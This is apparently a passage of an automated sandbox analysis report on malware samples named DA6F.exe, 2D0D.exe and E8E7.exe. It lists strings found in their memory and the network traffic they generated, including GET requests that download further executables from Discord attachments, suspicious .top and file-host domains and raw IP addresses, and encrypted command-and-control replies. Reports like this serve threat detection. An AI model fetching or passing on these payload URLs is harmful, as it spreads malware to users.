                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: explorer.exe, 00000006.00000000.306335693.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                      Source: DA6F.exe, 00000011.00000002.564895445.0000000003F21000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.565407928.000000000420D000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553519488.0000000002A0F000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: DA6F.exe, DA6F.exe, 00000011.00000002.524892081.0000000000CE3000.00000040.00020000.sdmp, E8E7.exe, 00000013.00000002.475010529.0000000003B4F000.00000004.00000001.sdmp, 2D0D.exe, 2D0D.exe, 0000001B.00000002.525274596.0000000001212000.00000020.00020000.sdmp, E8E7.exe, 0000001C.00000000.456220625.0000000000402000.00000040.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: 2D0D.exe, 0000001B.00000002.564745659.00000000041B6000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553806969.0000000002A53000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
                      Source: 2D0D.exe, 0000001B.00000002.563047294.0000000004032000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.564745659.00000000041B6000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/688809529202442354/908412484648591370/FULL.exe
                      Source: E8E7.exe, 0000001C.00000002.553806969.0000000002A53000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/825918003454935051/910266808546779187/Done.exe
                      Source: 2D0D.exe, 0000001B.00000002.564745659.00000000041B6000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553806969.0000000002A53000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com4
                      Source: DA6F.exe, 00000011.00000002.564895445.0000000003F21000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.565407928.000000000420D000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553519488.0000000002A0F000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: 2D0D.exe, 0000001B.00000002.567420054.0000000004452000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com
                      Source: DA6F.exe, 00000011.00000002.564895445.0000000003F21000.00000004.00000001.sdmp, DA6F.exe, 00000011.00000002.564105027.0000000003E75000.00000004.00000001.sdmp, DA6F.exe, 00000011.00000002.567824150.0000000004D32000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.565407928.000000000420D000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567420054.0000000004452000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.578332462.0000000005242000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553519488.0000000002A0F000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: DA6F.exe, 00000011.00000002.564895445.0000000003F21000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.565407928.000000000420D000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553519488.0000000002A0F000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: DA6F.exe, 00000011.00000002.567824150.0000000004D32000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab0ru
                      Source: DA6F.exe, 00000011.00000002.564105027.0000000003E75000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab4
                      Source: 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabLW
                      Source: 2D0D.exe, 0000001B.00000002.578332462.0000000005242000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabPp
                      Source: DA6F.exe, 00000011.00000002.564895445.0000000003F21000.00000004.00000001.sdmp, DA6F.exe, 00000011.00000002.564105027.0000000003E75000.00000004.00000001.sdmp, DA6F.exe, 00000011.00000002.567824150.0000000004D32000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.565407928.000000000420D000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567420054.0000000004452000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.578332462.0000000005242000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553519488.0000000002A0F000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                      Source: DA6F.exe, 00000011.00000002.564895445.0000000003F21000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.565407928.000000000420D000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553519488.0000000002A0F000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: DA6F.exe, 00000011.00000002.564895445.0000000003F21000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.565407928.000000000420D000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553519488.0000000002A0F000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                      Source: E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                      Source: E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                      Source: E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: DA6F.exe, 00000011.00000002.564895445.0000000003F21000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.565407928.000000000420D000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553519488.0000000002A0F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownDNS traffic detected: queries for: host-file-host6.com
                      Source: global trafficHTTP traffic detected: GET /attachments/825918003454935051/909883200657031198/Faints.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /attachments/903028136416002089/910600430113931304/123f.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /attachments/907388240229716010/909788097527545866/45756734124235.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-7000.top
                      Source: global trafficHTTP traffic detected: GET /setup.exe%09 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 216.128.137.31
                      Source: global trafficHTTP traffic detected: GET /files/9196_1637140254_4196.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host0.com
                      Source: global trafficHTTP traffic detected: GET /files/9370_1636985686_7616.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host0.com
                      Source: global trafficHTTP traffic detected: GET /vN1zS0qN2nD1iF6p/04805958955520964044.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.87.154.2
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1c b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c3 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 8e 2c b4 59 52 db 03 f8 e5 2c f3 65 0c 4f e5 af e3 1e bb 52 de 43 d2 fe 25 80 26 80 a8 93 59 2d f8 e3 00 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 45I:82OU&,YR,eORC%&Y-~0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b5 53 dc 4b d7 f6 27 85 21 eb a9 96 59 28 e3 b6 4d 2a e3 b3 b5 61 fa 91 be 5a ad 75 91 c8 37 42 5c 3f 0a 43 d3 bb 43 b3 f2 5c 83 a7 94 09 db 2b 0d 0a 30 0d 0a 0d 0a Data Ascii: 63I:82OB%,YR("XSK'!Y(M*aZu7B\?CC\+0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
